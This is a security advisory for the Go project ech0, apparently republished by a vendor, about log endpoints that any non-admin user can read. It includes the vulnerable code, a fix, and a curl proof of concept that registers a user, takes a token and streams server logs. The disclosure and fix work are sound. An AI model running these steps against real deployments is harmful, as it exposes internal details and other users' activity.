GHSA-w8jj-cwmc-wgq2
MEDIUMEch0's Missing Authorization on System Logs Allows Non-Admin Information Disclosure
Blast Radius
github.com/lin-snow/ech0Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects Go packages — download data is not available via public APIs for these ecosystems.
Description
Summary
The system log endpoints (GET /api/system/logs, GET /api/system/logs/stream, WS /ws/system/logs) lack authorization checks, allowing any authenticated non-admin user to read and stream all server logs. These logs contain error stack traces, internal file paths, module names, and arbitrary structured fields that facilitate reconnaissance for further attacks.
Details
The dashboard routes in internal/router/dashboard.go:7-8 register log endpoints on the AuthRouterGroup without any RequireScopes middleware:
// internal/router/dashboard.go
func setupDashboardRoutes(appRouterGroup *AppRouterGroup, h *handler.Bundle) {
appRouterGroup.AuthRouterGroup.GET("/system/logs", h.DashboardHandler.GetSystemLogs())
appRouterGroup.AuthRouterGroup.GET("/system/logs/stream", h.DashboardHandler.SSESubscribeSystemLogs())
appRouterGroup.WSRouterGroup.GET("/system/logs", h.DashboardHandler.WSSubscribeSystemLogs())
}
Compare with other admin-only routes that properly use RequireScopes:
// internal/router/setting.go — every route has RequireScopes
appRouterGroup.AuthRouterGroup.GET("/settings",
middleware.RequireScopes(authModel.ScopeAdminSettings),
h.SettingHandler.GetSiteSettings())
The AuthRouterGroup only applies JWTAuthMiddleware() (router.go:36), which validates the JWT and sets the viewer context but does not check admin status. The WSRouterGroup (router.go:37) has no middleware at all — the WebSocket handler only calls ParseToken to verify the JWT signature (dashboard.go:74) without any role/scope validation.
The handler (internal/handler/dashboard/dashboard.go:29-62) and service (internal/service/dashboard/dashboard.go:21-27) contain zero authorization checks. Other services in the codebase properly enforce admin access:
internal/service/inbox/inbox.go:132—ensureAdmin()internal/service/migrator/migrator.go:360—ensureAdmin()internal/service/comment/comment.go:719—requireAdmin()
Non-admin users are created with IsAdmin: false and IsOwner: false (internal/service/user/user.go:220-221) via the public registration endpoint.
The LogEntry struct (internal/util/log/log.go:78-87) exposes:
type LogEntry struct {
Time string `json:"time"`
Level string `json:"level"`
Msg string `json:"msg"`
Module string `json:"module,omitempty"`
Caller string `json:"caller,omitempty"` // internal file paths
Error string `json:"error,omitempty"` // error stack traces
Fields map[string]any `json:"fields,omitempty"` // arbitrary structured data
Raw string `json:"raw,omitempty"` // raw log lines
}
PoC
# 1. Register a non-admin user (system allows up to 5 users by default)
curl -X POST http://localhost:8080/api/register \
-H 'Content-Type: application/json' \
-d '{"username":"attacker","password":"Password123"}'
# 2. Login to get session token
TOKEN=$(curl -s -X POST http://localhost:8080/api/login \
-H 'Content-Type: application/json' \
-d '{"username":"attacker","password":"Password123"}' | jq -r '.data.token')
# 3. Read system logs — should require admin but doesn't
curl http://localhost:8080/api/system/logs \
-H "Authorization: Bearer $TOKEN"
# Returns: {"code":1,"data":[{"time":"...","level":"error","msg":"...","module":"...","caller":"internal/service/user/user.go:145","error":"...","fields":{...}},...]}
# 4. Subscribe to real-time log stream via SSE
curl -N "http://localhost:8080/api/system/logs/stream?token=$TOKEN"
# 5. Subscribe via WebSocket (WSRouterGroup has NO middleware)
# wscat -c "ws://localhost:8080/ws/system/logs?token=$TOKEN"
Impact
Any registered non-admin user can:
- Read all historical system logs including error traces that reveal internal code paths, database errors, and application state
- Stream real-time logs via SSE or WebSocket to monitor all server activity as it happens
- Gather reconnaissance data — caller fields expose internal file paths and line numbers, error fields expose stack traces and database query failures, module fields map the internal architecture
- Monitor other users' actions — authentication failures, registration events, and admin operations appear in logs
This information disclosure lowers the bar for chaining further attacks by revealing the application's internal structure, error handling patterns, and operational state.
Recommended Fix
Add RequireScopes middleware with an admin scope to the dashboard routes:
// internal/router/dashboard.go
func setupDashboardRoutes(appRouterGroup *AppRouterGroup, h *handler.Bundle) {
appRouterGroup.AuthRouterGroup.GET("/system/logs",
middleware.RequireScopes(authModel.ScopeAdminSettings),
h.DashboardHandler.GetSystemLogs())
appRouterGroup.AuthRouterGroup.GET("/system/logs/stream",
middleware.RequireScopes(authModel.ScopeAdminSettings),
h.DashboardHandler.SSESubscribeSystemLogs())
appRouterGroup.WSRouterGroup.GET("/system/logs",
middleware.RequireScopes(authModel.ScopeAdminSettings),
h.DashboardHandler.WSSubscribeSystemLogs())
}
Additionally, the WebSocket handler should validate admin scope after parsing the token, since the WSRouterGroup lacks middleware:
// internal/handler/dashboard/dashboard.go — WSSubscribeSystemLogs
claims, err := jwtUtil.ParseToken(token)
if err != nil {
ctx.AbortWithStatusJSON(http.StatusUnauthorized, gin.H{"msg": "invalid token"})
return
}
// Add admin check for WebSocket endpoint
if claims.TokenType == authModel.TokenTypeAccess && !containsScope(claims.Scopes, authModel.ScopeAdminSettings) {
ctx.AbortWithStatusJSON(http.StatusForbidden, gin.H{"msg": "admin access required"})
return
}
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐹Go | github.com/lin-snow/ech0 | all versions | 4.4.3 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for github.com/lin-snow/ech0. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update github.com/lin-snow/ech0 to 4.4.3 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-w8jj-cwmc-wgq2 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-w8jj-cwmc-wgq2 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-w8jj-cwmc-wgq2. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-w8jj-cwmc-wgq2 in your dependencies?
O3 detects GHSA-w8jj-cwmc-wgq2 across Go dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.